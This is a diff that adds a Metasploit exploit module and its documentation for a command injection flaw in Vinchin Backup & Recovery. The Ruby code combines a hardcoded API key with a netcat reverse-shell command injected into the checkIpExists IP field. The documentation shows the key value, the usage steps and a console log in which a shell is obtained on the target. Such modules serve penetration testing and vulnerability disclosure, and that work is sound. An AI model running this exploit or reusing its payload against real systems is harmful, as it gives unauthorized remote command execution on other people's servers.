Submission of New Exploit Module for Vinchin Backup & Recovery Command Injection

documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md

@@ -0,0 +1,156 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.*, 6.0.*, 6.7.*, and 7.0.*. To prepare the environment:
+
+1. Download Vinchin Backup & Recovery version 5.0.*, 6.0.*, 6.7.*, or 7.0.*.
+2. Install the software on a Linux-based server using the downloaded ISO.
+3. During the installation, ensure that the network interface is active and configured.
+4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
+
+*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
+
+## Verification Steps
+
+1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.*, 6.0.*, 6.7.*, or 7.0.*).
+2. Start msfconsole in your Metasploit environment.
+3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+4. Set the RHOSTS to the target IP address or hostname.
+5. Do: `run`
+6. If the target is vulnerable, the exploit will execute the specified payload or command.
+
+## Options
+
+Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
+
+#### RHOSTS
+
+- **Description**: Specifies the target address or range of addresses.
+- **Default Value**: None. It must be set by the user.
+
+#### RPORT
+
+- **Description**: The port on which the Vinchin Backup & Recovery service is running.
+- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
+
+#### SSL
+
+- **Description**: Specifies whether to use SSL for the connection.
+- **Default Value**: True, as Vinchin typically runs over HTTPS.
+
+#### TARGETURI
+
+- **Description**: The base path to the Vinchin Backup & Recovery application.
+- **Default Value**: `/api/`
+
+#### APIKEY
+
+- **Description**: The hardcoded API key required to authenticate to the API.
+- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
+
+## Scenarios
+
+### Successful Exploitation against Vinchin Backup & Recovery 6.7.*
+
+This scenario demonstrates exploiting the Vinchin Backup & Recovery version 6.7.* on a Linux server.
+
+**Environment**:
+- Vinchin Backup & Recovery 6.7.*
+- Linux Server
+- Metasploit Framework
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the exploit module:
+```
+use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+```
+4. Set the required options:
+```
+set RHOSTS [target IP]
+set APIKEY [API Key]
+```
+5. Optionally set a payload and configure LHOST and LPORT.
+6. Execute the exploit:
+```
+exploit
+```
+
+**Expected Output**:
+
+```
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
+
+Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
+
+   Name       Current Setting        Required  Description
+   ----       ---------------        --------  -----------
+   APIKEY     6e24cc40bfdb6963c04a4  yes       The hardcoded API key
+              f1983c8af71
+   Proxies                           no        A proxy chain of format type:host:
+                                               port[,type:host:port][...]
+   RHOSTS                            yes       The target host(s), see https://do
+                                               cs.metasploit.com/docs/using-metas
+                                               ploit/basics/using-metasploit.html
+   RPORT      443                    yes       The target port (TCP)
+   SSL        true                   no        Negotiate SSL/TLS for outgoing con
+                                               nections
+   SSLCert                           no        Path to a custom SSL certificate (
+                                               default is randomly generated)
+   TARGETURI  /api/                  yes       The base path to the Vinchin Backu
+                                               p & Recovery application
+   URIPATH                           no        The URI to use for this exploit (d
+                                               efault is random)
+   VHOST                             no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to lis
+                                       ten on. This must be an address on the loc
+                                       al machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be spec
+                                     ified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
+rhosts => 192.168.1.3
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set lhost 192.168.1.5
+lhost => 192.168.1.5
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
+
+[*] HTTP Response Code: 200
+[*] Detected Vinchin version: 7.0.1.26282
+[+] 192.168.1.3:443 - The target is vulnerable.
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Sending payload...
+[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.3:59354) at 2023-11-16 17:47:30 +0100
+SHELL=/bin/bash script -q /dev/null
+
+bash-4.2$ id
+uid=994(nginx) gid=992(nginx) groups=992(nginx)
+
+```

modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb

@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Vinchin Backup and Recovery Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Vinchin Backup & Recovery
+          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
+          checkIpExists API endpoint, an attacker can execute arbitrary commands as the
+          web server user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gregory Boddin (LeakIX)', # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-45498'],
+          ['CVE', '2023-45499'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45498'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45499'],
+          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
+          ['URL', 'https://vinchin.com/'] # Vendor URL
+        ],
+        'DisclosureDate' => '2023-10-26',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'AKA' => ['Vinchin Command Injection']
+        },
+        'Platform' => ['linux', 'unix'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'generic/shell_reverse_tcp',
+          'SSL' => true
+        },
+        'Privileged' => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/api/']),
+        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71'])
+      ]
+    )
+  end
+
+  def exploit
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT']
+    injection_command = "nc #{lhost} #{lport} -e /bin/bash"
+    data = "p={\"ip\":\"127.0.0.1 ;#{injection_command};\"}"
+    print_status('Sending payload...')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'vars_get' => {
+        'm' => '30',
+        'f' => 'checkIpExists',
+        'k' => datastore['APIKEY']
+      },
+      'data' => data
+    })
+  end
+
+  def check
+    target_uri_path = normalize_uri(target_uri.path.split('/')[0], '/login.php')
+    res = send_request_cgi('uri' => target_uri_path)
+
+    unless res
+      print_error('Failed to connect to the target.')
+      return CheckCode::Unknown('Failed to connect to the target.')
+    end
+
+    print_status("HTTP Response Code: #{res.code}")
+    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
+    version_match = res.body.match(version_pattern)
+
+    if version_match && version_match[1]
+      version = Rex::Version.new(version_match[1])
+      print_status("Detected Vinchin version: #{version}")
+
+      vulnerable_version_patterns = [
+        /^((5\.0|6\.0|6\.7)\.\d+(\.\d+)?|7\.0\.(0|1)(\.\d+)?)$/
+      ]
+
+      version = Rex::Version.new(version)
+
+      vulnerable = vulnerable_version_patterns.any? do |pattern|
+        pattern.match(version.to_s)
+      end
+
+      if vulnerable
+        return CheckCode::Vulnerable()
+      else
+        return CheckCode::Safe()
+      end
+
+    else
+      print_error('Unable to extract version with the regex provided.')
+      return CheckCode::Unknown('Unable to extract version.')
+    end
+  end
+end